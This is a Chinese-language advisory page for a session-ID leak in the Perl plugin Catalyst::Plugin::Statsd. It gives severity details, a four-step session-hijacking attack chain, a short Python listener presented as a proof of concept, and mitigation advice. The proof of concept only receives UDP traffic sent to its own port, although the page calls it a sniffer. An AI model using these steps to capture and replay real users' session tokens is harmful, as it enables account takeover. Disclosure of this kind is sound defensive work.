CVE-2026-45180 Catalyst::Plugin::Statsd会话泄露

漏洞信息

漏洞编号

CVE-2026-45180

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Catalyst::Plugin::Statsd

漏洞概述

Catalyst::Plugin::Statsd是Perl的一个插件，其0.10.0及之前版本存在会话泄露漏洞。当与statsd守护进程的通信信道未加密（例如通过UDP发送）时，用户的会话ID可能会被窃取。攻击者可利用这些泄露的ID作为认证令牌，非法访问系统并劫持用户会话，导致信息泄露及权限提升风险。

技术细节

该漏洞的根本原因在于Catalyst::Plugin::Statsd在收集和传输应用性能指标时，未能有效过滤敏感数据。插件在特定配置下，会将用户的Session ID包含在发送给Statsd守护进程的数据包中。由于Statsd通常使用UDP协议进行通信，这是一种无连接且不提供加密服务的传输层协议。如果网络配置不当，例如将数据发送至跨网络的远程主机，或者经过不安全的交换机环境，攻击者便可以利用嗅探工具（如Wireshark）轻易捕获网络流量。攻击者从UDP数据包中解析出Session ID后，可以通过修改浏览器Cookie等方式将其发送给服务器。由于服务器仅验证Session ID的有效性，攻击者即可绕过身份验证流程，以合法用户身份登录系统，造成严重的信息泄露和权限滥用。

攻击链分析

STEP 1

1. 环境侦查

攻击者确认目标应用程序使用Catalyst::Plugin::Statsd，且Statsd服务通过未加密的UDP向外部网络或不可信网络发送数据。

STEP 2

2. 流量截获

攻击者利用网络嗅探工具（如Wireshark、tcpdump或自定义脚本）监听网络流量，捕获发往Statsd守护进程端口的UDP数据包。

STEP 3

3. 数据解析

攻击者分析捕获到的UDP数据包负载，从中提取出包含的Session ID或其他敏感认证令牌。

STEP 4

4. 会话劫持

攻击者将提取到的Session ID设置在自己的浏览器Cookie中，向目标服务器发送请求，成功绕过验证并接管用户会话。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# This script simulates an attacker sniffing network traffic to capture leaked Session IDs via UDP.
# It listens on the standard Statsd port (8125).

import socket
import re

# Configuration
UDP_IP = "0.0.0.0"
UDP_PORT = 8125

# Regex pattern to simulate matching a Session ID (e.g., hex string)
SESSION_ID_PATTERN = re.compile(r'session_id=([a-f0-9]+)', re.IGNORECASE)

def sniff_statsd_traffic():
    # Create a UDP socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((UDP_IP, UDP_PORT))

    print(f"[*] Listening for UDP packets on port {UDP_PORT}...")

    while True:
        try:
            # Receive data
            data, addr = sock.recvfrom(1024) # buffer size 1024 bytes
            message = data.decode('utf-8', errors='ignore')
            
            # Check if the packet contains sensitive info
            match = SESSION_ID_PATTERN.search(message)
            if match:
                captured_sid = match.group(1)
                print(f"[!] Potential Session ID captured from {addr}: {captured_sid}")
                print(f"    Payload: {message}")
            else:
                print(f"[+] Received stats from {addr}: {message}")
                
        except KeyboardInterrupt:
            print("\n[*] Stopping sniffing.")
            break
        except Exception as e:
            print(f"[-] Error: {e}")

if __name__ == "__main__":
    sniff_statsd_traffic()

影响范围

Catalyst::Plugin::Statsd <= 0.10.0

防御指南

临时缓解措施

建议立即检查Statsd配置，禁止通过公网或不安全网络传输UDP数据包。如果不能立即升级，请暂时禁用该插件或确保流量仅限于本地主机。